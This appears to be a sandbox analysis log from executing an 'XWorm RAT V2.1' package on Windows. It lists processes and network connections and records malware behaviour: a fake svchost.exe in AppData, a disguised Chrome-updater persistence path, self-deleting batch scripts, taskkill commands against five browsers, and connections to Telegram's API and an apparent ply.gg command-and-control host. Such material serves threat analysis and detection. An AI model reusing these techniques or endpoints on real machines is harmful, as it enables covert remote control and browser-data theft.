C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7540 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 6544"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Fixer.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 5588"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Windows\system32\lodctr.exe
lodctr /r
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM brave.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moonreborn.com | udp |
| US | 172.67.133.17:443 | moonreborn.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| BE | 2.17.107.130:443 | r.bing.com | tcp |
| BE | 2.17.107.130:443 | r.bing.com | tcp |
| BE | 88.221.83.226:443 | th.bing.com | tcp |
| BE | 88.221.83.226:443 | th.bing.com | tcp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| GB | 2.18.66.75:443 | tcp | |
| IE | 20.50.73.4:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 186.83.221.88.in-addr.arpa | udp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | teams-ring.msedge.net | udp |
| US | 52.113.196.254:443 | teams-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | roxy.azurefd.net | udp |
| US | 104.212.67.120:443 | roxy.azurefd.net | tcp |
| US | 8.8.8.8:53 | 254.196.113.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.67.212.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| GB | 142.250.179.227:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.google.com | udp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 229.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| GB | 216.58.213.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| GB | 172.217.16.238:443 | accounts.youtube.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| N/A | 10.127.0.168:5900 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| N/A | 127.0.0.1:5900 | tcp | |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| BE | 88.221.83.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 200.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 2.17.107.107:443 | r.bing.com | tcp |
| BE | 2.17.107.107:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 107.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.201:443 | r.bing.com | tcp |
| BE | 88.221.83.185:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 201.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.83.221.88.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| BE | 88.221.83.248:443 | th.bing.com | tcp |
| BE | 88.221.83.201:443 | r.bing.com | tcp |
| BE | 88.221.83.248:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
